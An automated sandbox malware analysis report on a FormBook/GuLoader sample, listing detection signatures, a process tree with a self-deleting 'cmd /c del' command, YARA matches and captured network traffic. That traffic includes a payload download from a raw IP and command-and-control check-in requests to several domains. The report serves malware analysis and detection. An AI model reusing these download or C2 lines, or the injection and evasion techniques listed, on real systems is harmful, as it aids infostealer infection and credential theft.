Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report dwg.exe

Overview

General Information

Sample Name:dwg.exe
Analysis ID:357209
MD5:92628cc54ad5d8ffed4f28f9bf9f80f8
SHA1:586c6da770b640a04ad9f5d205308f5a2f84e42b
SHA256:6e6fa2f1d1b7e3c37b6c7a18a4bd750e6ca980741c87af931c17d2ed7e469c3e
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • dwg.exe (PID: 6408 cmdline: 'C:\Users\user\Desktop\dwg.exe' MD5: 92628CC54AD5D8FFED4F28F9BF9F80F8)
    • dwg.exe (PID: 6696 cmdline: 'C:\Users\user\Desktop\dwg.exe' MD5: 92628CC54AD5D8FFED4F28F9BF9F80F8)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmmon32.exe (PID: 2208 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
          • cmd.exe (PID: 6612 cmdline: /c del 'C:\Users\user\Desktop\dwg.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.461717156.00000000026E4000.00000004.00000020.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
  • 0x50e4:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000004.00000002.291759356.0000000000080000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000002.291759356.0000000000080000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x197a7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a84a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000002.291759356.0000000000080000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166d9:$sqlite3step: 68 34 1C 7B E1
    • 0x167ec:$sqlite3step: 68 34 1C 7B E1
    • 0x16708:$sqlite3text: 68 38 2A 90 C5
    • 0x1682d:$sqlite3text: 68 38 2A 90 C5
    • 0x1671b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16843:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000002.296448526.000000001DEB0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 15 entries

      Sigma Overview

      No Sigma rule has matched

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: dwg.exeReversingLabs: Detection: 17%
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000004.00000002.291759356.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.296448526.000000001DEB0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.460585611.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.461025057.0000000002360000.00000040.00000001.sdmp, type: MEMORY
      Source: 10.2.cmmon32.exe.49d7960.5.unpackAvira: Label: TR/Dropper.Gen
      Source: 10.2.cmmon32.exe.26e45d0.2.unpackAvira: Label: TR/Dropper.Gen

      Compliance:

      barindex
      Uses 32bit PE filesShow sources
      Source: dwg.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Binary contains paths to debug symbolsShow sources
      Source: Binary string: cmmon32.pdb source: dwg.exe, 00000004.00000003.290766684.000000000084D000.00000004.00000001.sdmp
      Source: Binary string: cmmon32.pdbGCTL source: dwg.exe, 00000004.00000003.290766684.000000000084D000.00000004.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: dwg.exe, 00000004.00000002.296549952.000000001E0E0000.00000040.00000001.sdmp, cmmon32.exe, 0000000A.00000002.463015429.00000000045BF000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: dwg.exe, cmmon32.exe
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop ebx
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop edi

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.3:49719 -> 45.153.203.193:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49726 -> 104.18.194.20:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49726 -> 104.18.194.20:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49726 -> 104.18.194.20:80
      Source: global trafficHTTP traffic detected: GET /gzjz/?Rxo=8pyT5Z4hoPNLSb&an=g/ID2zcVRpzk9dEh2O/HeBX/PmjvP3gMDSJL8xLFEItD5siNJ7dqXm1dyHJfWJK4oFU1 HTTP/1.1Host: www.hamiltonparkpdx.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?an=FjP/8nTVipDtB7rMeh6473uM1PeF+4kTlJ1YfKzI0TvNj01mXujzKbdkPkRKtuLnfvUf&Rxo=8pyT5Z4hoPNLSb HTTP/1.1Host: www.readingqueens.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?an=H++1jH4LKbR0fJKel0r+X/Bgsf9YQS9YCvMETuo+3edei6txUlQLYKB4EjEP5vt6Q2ea&Rxo=8pyT5Z4hoPNLSb HTTP/1.1Host: www.winningscotland.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?Rxo=8pyT5Z4hoPNLSb&an=LENh5Imcw7WV23PMDSK6gQgZ7usNfvsiux/HEpxATH+NcHhzFLQFIzxEn7XOqifbExQJ HTTP/1.1Host: www.kreatelymedia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?an=/pUzTSccEH+RkAwwv+GOC/YRN8fCteWKlCqISlYUoueysdRKiHy5pXXTDI02yup/WIos&Rxo=8pyT5Z4hoPNLSb HTTP/1.1Host: www.neuroacademyok.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?Rxo=8pyT5Z4hoPNLSb&an=jd3N18O1dmETY8AwSK2SCf/DBHf2WfDwkoednOutgI3n+6kC8/qkQJNPdpn7LPtDVMxb HTTP/1.1Host: www.india-vspakistanlive.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?Rxo=8pyT5Z4hoPNLSb&an=8yKicZTiYwz0hefatpOkgI7InzeyxHrMIp7ZjAxRWYlijCvBEtCIbqNPIKBmez+UsXeV HTTP/1.1Host: www.bloomingintoyou.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewIP Address: 192.0.78.25 192.0.78.25
      Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
      Source: Joe Sandbox ViewASN Name: AUTOMATTICUS AUTOMATTICUS
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewASN Name: NETLABFR NETLABFR
      Source: global trafficHTTP traffic detected: GET /nn.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 45.153.203.193Cache-Control: no-cache
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: unknownTCP traffic detected without corresponding DNS query: 45.153.203.193
      Source: global trafficHTTP traffic detected: GET /nn.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 45.153.203.193Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /gzjz/?Rxo=8pyT5Z4hoPNLSb&an=g/ID2zcVRpzk9dEh2O/HeBX/PmjvP3gMDSJL8xLFEItD5siNJ7dqXm1dyHJfWJK4oFU1 HTTP/1.1Host: www.hamiltonparkpdx.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?an=FjP/8nTVipDtB7rMeh6473uM1PeF+4kTlJ1YfKzI0TvNj01mXujzKbdkPkRKtuLnfvUf&Rxo=8pyT5Z4hoPNLSb HTTP/1.1Host: www.readingqueens.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?an=H++1jH4LKbR0fJKel0r+X/Bgsf9YQS9YCvMETuo+3edei6txUlQLYKB4EjEP5vt6Q2ea&Rxo=8pyT5Z4hoPNLSb HTTP/1.1Host: www.winningscotland.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?Rxo=8pyT5Z4hoPNLSb&an=LENh5Imcw7WV23PMDSK6gQgZ7usNfvsiux/HEpxATH+NcHhzFLQFIzxEn7XOqifbExQJ HTTP/1.1Host: www.kreatelymedia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?an=/pUzTSccEH+RkAwwv+GOC/YRN8fCteWKlCqISlYUoueysdRKiHy5pXXTDI02yup/WIos&Rxo=8pyT5Z4hoPNLSb HTTP/1.1Host: www.neuroacademyok.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?Rxo=8pyT5Z4hoPNLSb&an=jd3N18O1dmETY8AwSK2SCf/DBHf2WfDwkoednOutgI3n+6kC8/qkQJNPdpn7LPtDVMxb HTTP/1.1Host: www.india-vspakistanlive.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /gzjz/?Rxo=8pyT5Z4hoPNLSb&an=8yKicZTiYwz0hefatpOkgI7InzeyxHrMIp7ZjAxRWYlijCvBEtCIbqNPIKBmez+UsXeV HTTP/1.1Host: www.bloomingintoyou.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: unknownDNS traffic detected: queries for: www.hamiltonparkpdx.com
      Source: dwg.exeString found in binary or memory: http://45.153.203.193/nn.bin
      Source: explorer.exe, 00000005.00000000.277791370.000000000F540000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
      Source: cmmon32.exe, 0000000A.00000002.463980109.0000000004B52000.00000004.00000001.sdmpString found in binary or memory: http://hhspapp8.com/dh5/index.html
      Source: cmmon32.exe, 0000000A.00000002.463980109.0000000004B52000.00000004.00000001.sdmpString found in binary or memory: http://push.zhanzhang.baidu.com/push.js
      Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
      Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
      Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
      Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
      Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
      Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
      Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
      Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
      Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
      Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
      Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
      Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
      Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
      Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
      Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
      Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
      Source: cmmon32.exe, 0000000A.00000002.463980109.0000000004B52000.00000004.00000001.sdmpString found in binary or memory: http://www.hhappxz.com/
      Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
      Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
      Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
      Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
      Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
      Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
      Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
      Source: explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
      Source: cmmon32.exe, 0000000A.00000002.463980109.0000000004B52000.00000004.00000001.sdmpString found in binary or memory: https://www.bloomingintoyou.com/gzjz/?Rxo=8pyT5Z4hoPNLSb&an=8yKicZTiYwz0hefatpOkgI7InzeyxHrMIp7ZjAxR
      Source: cmmon32.exe, 0000000A.00000002.463980109.0000000004B52000.00000004.00000001.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000004.00000002.291759356.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.296448526.000000001DEB0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.460585611.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.461025057.0000000002360000.00000040.00000001.sdmp, type: MEMORY

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 0000000A.00000002.461717156.00000000026E4000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 00000004.00000002.291759356.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000004.00000002.291759356.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000004.00000002.296448526.000000001DEB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000004.00000002.296448526.000000001DEB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000A.00000002.460585611.00000000001E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000A.00000002.460585611.00000000001E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000A.00000002.461025057.0000000002360000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000A.00000002.461025057.0000000002360000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000A.00000002.463830371.00000000049D7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E6233 NtSetInformationThread,LoadLibraryA,NtResumeThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E5C93 NtWriteVirtualMemory,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E1084 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E0511 EnumWindows,NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E2618 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E2813 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E060A NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E623A NtResumeThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E6448 NtResumeThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E2844 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E267E NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E1870 NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E646C NtResumeThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E246A NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E2E68 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E628E NtResumeThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E62B4 NtResumeThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E62DC NtResumeThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E24D4 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E64C8 NtResumeThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E26C1 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E6304 NtResumeThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E052E NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E655C NtResumeThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E635A NtResumeThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E2546 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E0573 NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E6380 NtResumeThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E25AE NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E05A6 NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E21D6 NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E63FD NtResumeThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E149660 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1496E0 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E149710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E149780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1497A0 NtUnmapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E149FE0 NtCreateMutant,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E149540 NtReadFile,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1495D0 NtClose,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E149A00 NtProtectVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E149A20 NtResumeThread,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E149A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E149840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E149860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1498F0 NtReadVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E149910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1499A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E149610 NtEnumerateValueKey,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E149650 NtQueryValueKey,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E149670 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1496D0 NtCreateKey,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E14A710 NtOpenProcessToken,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E149730 NtQueryVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E14A770 NtOpenThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E149770 NtSetInformationFile,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E149760 NtOpenProcess,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E14AD30 NtSetContextThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E149520 NtWaitForSingleObject,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E149560 NtWriteFile,
